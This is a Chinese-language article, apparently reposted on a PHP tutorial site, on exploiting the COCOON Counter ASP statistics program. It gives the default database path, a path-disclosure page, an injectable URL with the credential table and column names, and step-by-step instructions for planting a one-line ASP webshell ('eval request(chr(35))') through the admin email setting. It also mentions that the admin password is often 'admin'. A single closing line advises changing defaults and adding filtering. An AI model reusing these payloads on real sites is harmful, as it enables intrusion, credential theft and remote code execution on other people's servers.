网站地图    收藏   

主页 > 后端 > 网站安全 >

COCOON Counter统计程序漏洞总结 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 一、默认数据库:counter/_db/db_CC_Counter6.mdb也可直接打开:http://www.2cto.com /Counter/utilities/update.asp查看源文件,查找! ,就可以找到数据库的地址。程序的问题。二、暴路径漏洞利用探针h...

 
一、默认数据库:
counter/_db/db_CC_Counter6.mdb
也可直接打开:http://www.2cto.com /Counter/utilities/update.asp
查看源文件,查找<! ,就可以找到数据库的地址。程序的问题。
二、暴路径漏洞
利用探针http://www.2cto.com /Counter/utilities/aspSysCheck.asp,查看网站路径。
三、注入
存在用户注入,猜解出用户的帐号和密码,无法拿SHELL只可社工利用。
http://www.2cto.com /xxcount/core/default.asp?id=xxcnc
流量统计用户名是xxcnc,保存密码的表名是t_Site,用户名列是UID,密码列是PWD,登录页面(http://www.2cto.com /xxcount/supervise/login.asp)
四、后台插马
需要进后台,可插一句拿SHELL。不过大多说管理员密码都为admin,管理员密码并未保存在数据库中,在_inc/Common.asp中。
具体:进后台在管理信箱那把
cnhacker@263.net":eval request(chr(35))//
复制过去,,点击保存,看下_inc/common.asp的内容。
WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//"
嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将"转义成了\"所以这用了evalrequest(chr(35))嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号。
另注:黑防也有人提到了类似方法,可以写成9xiao"%><%eval request(chr(35))%><%',这个方法也比较巧妙,//和'在asp都是注释语句!
by 逍遥复仇


www.2cto.com提供修方案:
注意修改默认路径和默认密码。加强过滤和验证。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论